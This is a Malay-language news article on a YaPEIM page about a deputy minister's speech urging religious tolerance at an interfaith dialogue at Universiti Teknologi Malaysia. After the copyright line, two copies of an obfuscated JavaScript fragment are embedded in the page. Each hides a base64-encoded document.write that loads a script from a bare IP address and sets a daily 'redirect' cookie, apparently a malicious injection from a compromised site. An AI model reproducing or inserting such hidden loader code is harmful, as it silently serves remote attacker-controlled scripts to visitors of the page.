YaPEIM » Toleransi diterap di peringkat akar umbi – Asyraf Wajdi

Terkini

Toleransi diterap di peringkat akar umbi – Asyraf Wajdi

Program Dialog Antara Agama itu dibarisi panel yang mewakili setiap agama ba­gi membincangkan serta ber­kongsi pendapat dan pengalaman untuk mencapai titik persamaan, sekali gus membuka lebih ba­nyak ruang ke arah mengutuhkan persefahaman dan keharmonian.

JOHOR BAHRU 12 Dis. – Rakyat berbilang kaum di negara ini seharusnya bersepakat meraih muafakat melalui kerjasama yang tidak berbelah-bahagi dari segi toleransi untuk melahirkan kehidupan yang aman dan harmoni.

Timbalan Menteri di Jabatan Perdana Menteri, Datuk Dr. Asy­raf Wajdi Dusuki berkata, sikap toleransi dalam kalangan rakyat yang mempunyai kepelbagaian agama, bahasa, budaya dan etnik haruslah diterapkan bermula dari akar umbi dan pencarian titik persamaan bermula daripada kesedaran diri.

Katanya, titik-tolak daripada itu, langkah yang proaktif perlu diambil agar kejayaan kesaksamaan yang diinginkan dalam mewujudkan hubungan kukuh antara anutan agama serta keharmonian negara akan terlaksana.

“Pada realitinya, memang tidak dapat dinafikan bahawa kadangkala isu-isu sensitif turut meniti di bibir masyarakat, namun ia masih belum sempat menular dengan lebih parah yang mampu mengganggu-gugat keamanan negara.

“Bagaimanapun, penolakan se­barang unsur yang boleh me­runtuhkan perpaduan dalam bermasyarakat harus diambil dengan langkah sederap. Ia merupakan pendekatan yang sangat signifikan bagi memastikan keharmonian hidup masyarakat berbilang latar belakang dan keupayaan terus dilaksanakan,” katanya.

Beliau berkata demikian ketika merasmikan Program Dia­log Antara Penganut Agama bertajuk Muhibah Teras Perpaduan Nasional: Toleransi Beragama Dalam Kepelbagaian Masyarakat Tonggak Keharmonian Negara di Universiti Teknologi Malaysia (UTM) di sini hari ini.

Teks ucapan beliau dibacakan Ahli Lembaga Pemegang Amanah Yayasan Pembangunan Ekonomi Islam Malaysia (Yapeim) merangkap Ketua Pegawai Eksekutif SME Corporation, Datuk Dr. Hafsah Hashim.

Program Dialog Antara Agama itu dibarisi panel yang mewakili setiap agama ba­gi membincangkan serta ber­kongsi pendapat dan pengalaman untuk mencapai titik persamaan, sekali gus membuka lebih ba­nyak ruang ke arah mengutuhkan persefahaman dan keharmonian.

Asyraf Wajdi berkata, program anjuran Yapeim itu adalah satu usaha bagi menyemarakkan jalinan kasih sayang antara pelbagai agama supaya kita semua menyedari bahawa keamanan serta kedamaian yang dimiliki ketika ini harus dikekalkan secara konsisten.

“Pemahaman yang jelas akan memberi makna muhibah dan toleransi yang pasti akan membuahkan hasil berbekas di dalam hati masyarakat berbilang bangsa, manakala semangat perpaduan dalam bermasyarakat dan keharmonian negara dapat dikekalkan,” katanya.

Artikel Penuh: http://www.utusan.com.my/berita/nasional/toleransi-diterap-di-peringkat-akar-umbi-asyraf-wajdi-1.572109#ixzz517fFA2Nj
© Utusan Melayu (M) Bhd

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top